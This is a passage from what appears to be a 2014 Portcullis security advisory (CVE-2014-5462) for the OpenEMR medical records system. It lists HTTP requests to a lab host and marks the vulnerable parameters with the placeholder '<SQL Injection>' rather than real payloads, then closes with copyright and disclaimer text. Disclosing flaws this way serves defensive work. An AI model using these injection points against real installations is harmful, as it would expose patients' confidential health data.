form_show_available=on&form_refresh=&form_to_date=2014-07-25&patient=<SQL Injection>&form_provider=1<SQL Injection>&form_apptstatus=<SQL Injection>&with_out_facility=on&form_facility=4<SQL Injection>&form_apptcat=9&form_from_date=2014-07-25&with_out_provider=on&form_orderby=date
Request 16
POST /openemr/interface/patient_file/summary/demographics_save.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=3m910jdpv3bfed8kie9jihecn6; pma_lang=en; pma_collation_connection=utf8_general_ci
form_i2subscriber_employer_country=USA&i3subscriber_DOB=0000-00-00&i3accept_assignment=FALSE&i3subscriber_city=Winterville&form_hipaa_mail=NO&form_allow_imm_info_share=NO&form_street=5&i3effective_date=0000-00-00&form_i1subscriber_state=AL&form_interpretter=5&i1subscriber_lname=boom&form_title=Mr.&i1subscriber_fname=boom&form_fname=Asd&form_i1subscriber_employer_state=AL&form_i1subscriber_relationship=self&form_i1subscriber_country=USA&form_i3subscriber_employer_state=AL&form_contact_relationship=5&form_mothersname=boom&i2group_number=5&form_em_state=AL&form_i3subscriber_country=USA&form_allow_patient_portal=NO&i2copay=5&i2policy_number=5&form_i2subscriber_sex=Female&i1accept_assignment=FALSE&i3subscriber_postal_code=SW1A+1AA&i2subscriber_ss=5&i1subscriber_mname=boom&form_pharmacy_id=0&i3subscriber_phone=5&form_phone_home=5&form_lname=Asd&mode=save&form_i2subscriber_country=USA&i2subscriber_employer=5&db_id=1<SQL Injection> &form_i1subscriber_employer_country=USA&form_d
eceased_reason=5&form_i2subscriber_state=AL&form_city=Winterville&form_email=winter@example.com&i3subscriber_employer_street=5&form_genericval2=asd&i3group_number=5&form_em_street=5&form_genericval1=asd&form_language=armenian&i1provider=&i2provider=&form_em_city=Winterville&form_em_name=boom&i3subscriber_fname=boom&form_race=amer_ind_or_alaska_native&i1plan_name=boom&i3subscriber_employer_city=Winterville&form_pubpid=asd&form_mname=Asd&i2subscriber_employer_street=5&form_financial_review=0000-00-00+00%3a00%3a00&i3subscriber_mname=boom&i3provider=&i3subscriber_employer_postal_code=SW1A+1AA&form_country_code=USA&form_em_country=USA&i2subscriber_phone=5&i3policy_number=5&form_status=married&form_ss=asdasd&form_monthly_income=01&i1effective_date=0000-00-00&form_i2subscriber_relationship=self&i3plan_name=boom&i1subscriber_employer_street=5&i1subscriber_city=Winterville&form_allow_imm_reg_use=NO&form_drivers_license=asd&form_i3subscriber_employer_country=USA&form_em_postal_code=SW
1A+1AA&form_hipaa_message=30&i1subscriber_employer_city=Winterville&i1subscriber_postal_code=SW1A+1AA&i3copay=5&i1copay=5&i3subscriber_street=5&i3policy_type=12&i1subscriber_street=5&form_vfc=eligible&form_i2subscriber_employer_state=AL&i2subscriber_street=5&form_guardiansname=boom&i1policy_number=5&i3subscriber_lname=boom&form_phone_contact=5&i2subscriber_employer_postal_code=SW1A+1AA&form_homeless=5&form_i1subscriber_sex=Female&form_i3subscriber_state=AL&form_referral_source=Patient&i2subscriber_fname=boom&i1subscriber_ss=5&form_providerID=1&form_state=AL&form_postal_code=SW1A+1AA&form_hipaa_allowsms=NO&i1subscriber_DOB=0000-00-00&i2subscriber_employer_city=Winterville&form_hipaa_allowemail=NO&form_DOB=1994-02-07&form_deceased_date=0000-00-00+00%3a00%3a00&i2effective_date=0000-00-00&i2subscriber_DOB=0000-00-00&i2subscriber_postal_code=SW1A+1AA&form_genericname2=asdasd&form_genericname1=asasd&i1group_number=5&i2subscriber_mname=boom&i2accept_assignment=FALSE&i1subscriber_em
ployer=5&i3subscriber_ss=5&form_phone_cell=5&i2subscriber_lname=boom&form_ethnicity=hisp_or_latin&i1subscriber_phone=5&form_occupation=5&i3subscriber_employer=5&form_hipaa_voice=NO&form_allow_health_info_ex=NO&form_ref_providerID=1&i1policy_type=12&i1subscriber_employer_postal_code=SW1A+1AA&i2plan_name=boom&i2policy_type=12&form_hipaa_notice=NO&form_migrantseasonal=5&form_i3subscriber_relationship=self&form_i3subscriber_sex=Female&form_family_size=5&i2subscriber_city=Winterville&form_phone_biz=5&form_sex=Female
Request 17
GET /openemr/interface/fax/fax_dispatch_newpid.php?p=1<SQL Injection> HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=3m910jdpv3bfed8kie9jihecn6
Connection: keep-alive
Request 18
GET /openemr/interface/patient_file/reminder/patient_reminders.php?mode=simple&patient_id=1<SQL Injection> HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=ra3sfkvd85bjve6qjm9ouq3225
Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-5462/
Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.